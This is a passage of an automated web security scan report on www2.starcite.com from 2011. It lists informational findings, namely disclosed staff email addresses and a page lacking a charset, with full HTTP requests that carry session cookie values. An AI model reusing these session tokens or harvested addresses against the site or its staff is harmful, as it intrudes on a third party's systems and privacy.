Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 29 May 2008 15:50:25 GMT
ETag: "100000000259c-1096-44e607cd4f240"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

5.8. http://www2.starcite.com/starcite/node/929

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.9. http://www2.starcite.com/starcite/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="mailto:security@starcite.com">security@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
ing such access would violate another person's rights. In some circumstances, StarCite may charge a reasonable fee for access to Personal Data. Users can contact the StarCite customer services team at service@starcite.com to request access to change personal information.</p>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...

6. HTML does not specify charset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/form.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /starcite/Solutionvideo/form.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:46 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 19:17:52 GMT
ETag: "29000000002dbf-60b5-47703a6b9d474"
Accept-Ranges: bytes
Content-Length: 24757
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...
